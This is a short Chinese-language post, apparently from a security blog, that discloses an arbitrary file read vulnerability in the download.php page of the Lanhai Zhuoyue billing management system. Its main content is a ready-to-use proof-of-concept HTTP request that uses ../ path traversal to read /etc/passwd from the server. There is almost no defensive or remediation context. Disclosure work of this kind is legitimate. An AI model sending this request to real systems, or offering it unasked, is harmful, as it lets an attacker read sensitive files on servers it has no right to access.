蓝海卓越计费管理系统 任意文件读取漏洞

# 蓝海卓越计费管理系统 任意文件读取漏洞

蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.

poc:

“`
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
“`

via:peiqi

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容